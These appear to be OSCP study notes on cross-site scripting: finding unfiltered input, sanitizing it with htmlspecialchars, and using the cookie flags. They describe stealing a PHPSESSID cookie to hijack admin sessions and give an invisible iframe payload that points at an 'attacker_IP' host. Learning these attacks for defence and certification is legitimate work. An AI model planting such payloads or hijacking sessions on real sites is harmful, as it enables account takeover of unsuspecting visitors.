Comment on page
if you inspect the web pages and still see those raw chars, it's vulnerable!
if not properly filtered (PHP) -> "htmlspecialchars" function should be used to properly sanitize it, which convert key characters into HTML entities.
What's cookies and what can we do with them?
cookies -> websites have them to track state info about users. Cookies can be set with flags that are not required. We want to look for Secure and HttpOnly flags
- Secure flags - intruct browser to only send the cookie over encrypted connections
The following script sends a GET request to the attacker's machine and force the victim to send the cookie (PHPSESSID) with it.
If a user logs into the server, we get a call back and steal the cookie.
Use a cookie editor to add the session info and visit an admin only pages!
OSCP book didn't cover any non-client facing XSS.
Client side attacks:
<iframe src=http://attacker_IP/malicious height=”0” width=”0”></iframe>
people who visit the site that has this invisible iframe will connect back to the attacker's machine! (attacker can set up a netcat listner)